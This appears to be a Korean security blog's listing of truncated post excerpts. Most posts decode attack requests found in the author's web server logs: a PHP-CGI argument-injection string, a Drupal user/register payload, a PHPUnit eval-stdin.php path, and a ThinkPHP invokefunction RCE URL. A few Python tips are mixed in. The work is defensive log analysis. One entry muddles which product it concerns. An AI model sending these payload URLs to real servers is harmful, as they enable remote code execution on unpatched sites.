<OOO>

생각보다 다양한 공격이 들어오고 공격 로그를 살펴보면 RCE 취약점이 대부분 인것같다. 이번에도 새로운 공격 로그를 들고왔다!! /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E..

웹 서버 로그 에 이런게 찍혀있었다. /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 url encoding이 되어있어 한눈에 보기 어렵지만 뭔가 이상한 로그라고 생각이 바로 든다. 얘를 디코딩 하면 /user/register?element_parents=timezone/timez..

url = "http://example.com" r = requests.get(url) html = r.text soup = BeautifulSoup(html,'html.parser') links = soup.find_all("a") 굵게 칠해진 부분을 확인해보자. soup 변수에 html 을 넣어줄때 r.text 혹은 r.content 를 안넣어줘서 발생한 오류다.

웹 서버 로그에 이런게 찍혀있다. /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php PHPUnit RCE 취약점이다. 영향을 받는 버전대는 4.8.28 이전의 버전 혹은 5.6.3 이전의 5.x 에서 발생한다. vendor 디렉토리는 패키지가 저장되는 폴더이며 composer를 통해 설치되는 패키지들을 저장한다. composer는 php의 의존성 관리 도구이다. POST 방식으로 날아가며 상단에는 /vendor/phpunit ~~~ 으로 넣고 body에 라는 php 코드를 같이 사용하는 것 같다. (test는 예시) 이 취약점은 eval-stdin.php의 페이지 요청이 되면서 제대로 된 인증이 존재하지 않아 발생하는 취약점이다. 참고 cve.mitre.org/..

웹 서버 로그에 이런게 찍혀있다. /?a=fetch&content=die(@md5(HelloThinkCMF)) 앞에 설명했던 ThinkPHP가 생각이 나게끔 만드는 로그다. vBulletin 템플릿에서 발생하는 취약점인데 영향받는 버전은 5.0.0 ~ 5.5.4 까지 받는다고 한다. 이것도 원격코드 실행 취약점(RCE)이며 워드프레스 인것같다. 출처 www.zdnet.com/article/security-researcher-publishes-details-and-exploit-code-for-a-vbulletin-zero-day/ blog.alyac.co.kr/3180 jeongzzang.com/173

웹 서버를 열어놨더니 이상한 로그가 찍혀있어 리서치용으로 포스터를 작성하고자 한다. ThinkPHP 란? 중국에서 개발한 PHP 프레임 워크. 이 취약점이 발표될 당시에 중국에선 4만여개의 사이트들이 ThinkPHP를 사용했었는데 해킹 사건이 많이 발생했다. 한국에도 ThinkPHP를 사용하긴 한다.(극소수) 영향 받는 버전 : 5.0.20,5.1.30 cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20062 이 취약점을 사용하면 RCE, 즉 원격명령 실행이 가능하다. 해당 exploit 코드는 다음과 같다. /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md..

파이썬에서 tor 사용할 때 불가피하게 파일 저장을 해야할 경우가 있다. (예를 들어 프로젝트 할 때!) wget이나 다른 것들을 이용해서 저장을 할려고 했지만... .onion 사이트를 인식을 못해 오류를 뱉는다. 해당 페이지에 있는 파일 리스트를 가져온 후 파일을 저장하는 코드이다. for i in file_list: open(i,'wb').write(URL.content)

파이썬으로 wget 사용할 때 모듈이 없다면서 오류가 뜨는 경우가 있다. ModuleNotFoundError: No module named 'wget' 분명히 pip3 install wget 혹은 pip install wget 을 해줬는데도 안될때는 apt-get install --reinstall python3-wget 를 해주면 해결된다.